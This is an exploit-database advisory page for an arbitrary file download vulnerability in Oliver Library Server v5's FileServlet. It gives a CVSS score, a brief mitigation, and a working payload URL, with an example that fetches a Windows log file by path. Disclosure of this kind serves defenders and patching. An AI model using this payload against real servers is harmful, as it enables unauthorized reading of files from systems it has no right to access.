Oliver Library Server v5 - Arbitrary File Download

vendor:

Oliver Library Server

by:

Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group

8.8

CVSS

HIGH

Arbitrary File Download

CWE

Product Name: Oliver Library Server

Affected Version From: < 8.00.008.053

Affected Version To: < 8.00.008.053

Patch Exists: NO

Related CWE:

CPE: a:softlink_international:oliver_library_server:5.0

Metasploit:

Other Scripts:

Platforms Tested: Windows Server 2016

2021

Oliver Library Server v5 – Arbitrary File Download

An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.

Mitigation:

Ensure that user supplied input is sanitized and validated before being used in the FileServlet function.

Source

Exploit-DB raw data:

# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/ 
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016

Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.

Steps to Exploit:

1)  Use the following Payload:
        https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>

2) Example to download iis.log file:
        https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log